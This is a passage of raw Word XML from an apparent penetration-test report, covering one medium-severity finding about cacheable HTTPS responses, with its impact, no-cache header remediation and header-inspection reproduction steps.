              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="750" w:type="pct"/>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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="638C4E40" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1750" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18A2EAC2" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62B4BCE3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABF3791" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The application serves HTTP responses over HTTPS that include headers permitting caching of content by intermediary proxies or client browsers. While caching can improve performance, allowing sensitive information to be cached, even temporarily, can lead to unintended data exposure if the cached content is accessed by unauthorized individuals, stored on a shared machine, or persists beyond the intended session lifespan. This vulnerability is particularly relevant when responses contain user-specific data, authentication tokens, or other confidential information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C38D1E" w14:textId="69B8DBF1" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0990C3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>This issue, if exploited, could lead to the unintended disclosure of sensitive government data or personal information. This data exposure could result in significant reputational damage to the government entity, eroding public trust. Furthermore, it could lead to non-compliance with stringent regulatory requirements such as NIST CSF, which mandates robust protection of sensitive information, potentially incurring penalties or requiring extensive remediation efforts and auditing. Financial implications could arise from incident response, notification costs, and legal liabilities associated with data breaches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73037303" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666022C3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>STRATEGIC FIX (Architecture):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1122899B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement a comprehensive caching policy across the application and infrastructure, ensuring that sensitive data is never intentionally </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cached</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. This may involve architecting applications to separate public, cacheable content from private, non-cacheable data streams. Leverage secure content delivery practices and ensure that all sensitive transactions are explicitly marked as non-cacheable at the application and web server levels. Regular security architecture reviews should include an assessment of caching mechanisms and their impact on data confidentiality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7505AEF6" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76160149" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TACTICAL FIX (Code Implementation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453C3957" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">For all HTTP responses that contain sensitive information or should not be </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cached</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, implement the following HTTP headers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3270A722" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C885BD" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Pragma: no-cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BF7AF3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Expires: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDCAD92" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ensure these headers are consistently applied by the application (e.g., in Struts actions or filters) or the web server configuration (e.g., Apache/Nginx) for all relevant paths and content types. For Struts 1, this can often be </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>configured within the Action or via a Filter. Verify that these headers are being sent correctly in all environments after implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FB8618" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D540835" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Navigate to a page on the application that displays user-specific or potentially sensitive information. 2. Using a web proxy tool (e.g., Burp Suite) or browser developer tools (Network tab), capture the HTTP response headers for the page. 3. Observe that the response headers include 'Cache-Control' directives that permit </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>caching</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., 'public', 'max-age', or absence of 'no-store' and 'no-cache') or that 'Pragma: no-cache' and 'Expires: 0' are missing. 4. This indicates that the content is cacheable by browsers or intermediate proxies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCBA9A7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3841B0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• OWASP Top 10 2021: A05:2021-Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3CC47F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• Mozilla Developer Network (MDN) - Cache-Control: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624B0185" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• W3C HTTP/1.1 Caching: https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72862CCC" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="009B7CCA">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11F5" w14:textId="77777777" w:rsidR="0033773A" w:rsidRDefault="0033773A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5CE13123" w14:textId="77777777" w:rsidR="0033773A" w:rsidRDefault="003377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16B5" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="6" w:space="1" w:color="E2E8F0"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9000"/>
      </w:tabs>
      <w:spacing w:before="200"/>
    </w:pPr>
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>PentestLogger</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> Report v1.0</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877518">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877518">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F856C" w14:textId="77777777" w:rsidR="0033773A" w:rsidRDefault="0033773A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="74A2B397" w14:textId="77777777" w:rsidR="0033773A" w:rsidRDefault="003377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F6DE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="1" w:color="E2E8F0"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9000"/>
      </w:tabs>
      <w:spacing w:after="300"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="DC2626"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>CONFIDENTIAL</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:tab/>
      <w:t>VSPS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F1315"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="62C8EDB2"/>
    <w:lvl w:ilvl="0" w:tplc="4ED0DD28">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E272C8BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="91A27154">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="288027AE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="A6E05882">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="F33830E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="994C950E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="A68CF036">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E47E6A48">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1119566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CCA"/>
    <w:rsid w:val="00200FD9"/>
    <w:rsid w:val="0033773A"/>
    <w:rsid w:val="00877518"/>
    <w:rsid w:val="009B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777D"/>
  <w15:docId w15:val="{DF9D2EA5-D05D-4D61-8B8A-5BDFA750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Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="1E293B"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="400" w:after="200"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="300" w:after="150"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="200" w:after="100"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="64748B"/>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71</Pages>
  <Words>23715</Words>
  <Characters>135180</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1126</Lines>
  <Paragraphs>317</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>158578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Faissal Chtaiti</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-03T18:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-03T19:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>